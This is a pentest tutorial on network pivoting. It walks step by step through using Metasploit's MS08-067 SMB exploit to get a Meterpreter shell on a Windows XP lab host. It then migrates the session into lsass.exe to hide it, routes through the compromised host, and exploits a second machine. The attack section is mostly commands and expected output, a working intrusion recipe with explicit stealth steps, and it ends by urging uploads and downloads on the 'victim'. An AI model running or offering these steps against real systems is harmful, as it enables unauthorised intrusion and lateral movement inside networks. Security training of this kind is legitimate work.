Overview
Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.
Exploit
In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then using pivoting, exploit another host on the network.
Requirements: The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running WindowsXP Pro – Service Pack 2.
Exploit steps:
- Open a terminal in Backtrack and enter the following commands:
- #msfconsole
- msf > show exploits
- msf > use windows/smb/ms08_067_netapi
- msf exploit(ms08_067_netapi) > show payloads
- msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp - msf exploit (ms08_067_netapi) > show options
- msf exploit (ms08_067_netapi) > set RHOST <1st victim’s ip address>
RHOST => <ip address> - msf exploit (ms08_067_netapi) > exploit //if you are successful, you will see a meterpreter prompt
- meterpreter > //if you see this you have a Meterpreter shell
- meterpreter > shell //this will give you a Windows command prompt/shell
- C:\WINDOWS\sytem32> exit //exit out of the Windows command prompt
- meterpreter > getpid //note the process id that Meterpreter is using
- meterpreter > ps //list all running process on the victim machine. What process does your PID shows up as? svchost.exe? Look for the process “lsass.exe” , it may show up as PID 700
- meterpreter > migrate 700 //migrate Meterpreter to the lsass.exe process
- meterpreter > getpid //verify your new process ID
- ctrl+z //Key in ctrl+z to background the Meterpreter session
- msf > route add <2nd victim’s ip address> <subnet mask> <session id #> //route a new attack to victim 2
- msf > use windows/smb/ms08_067_netapi
- msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- msf exploit (ms08_067_netapi) > set RHOST <2nd victim’s ip address>
- msf exploit (ms08_067_netapi) > exploit
- meterpreter > //success!!!!
Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:
meterpreter > help //help menu
meterpreter > background //backgrounds the current session
meterpreter > exit //terminate the meterpreter session
meterpreter > quit //terminate the meterpreter session
meterpreter > write //writes data to a channel
meterpreter > mkdir //creates a directory
meterpreter > download //download a file or directory
meterpreter > upload //upload a file or directory
meterpreter > search //search for a file
Video Tutorial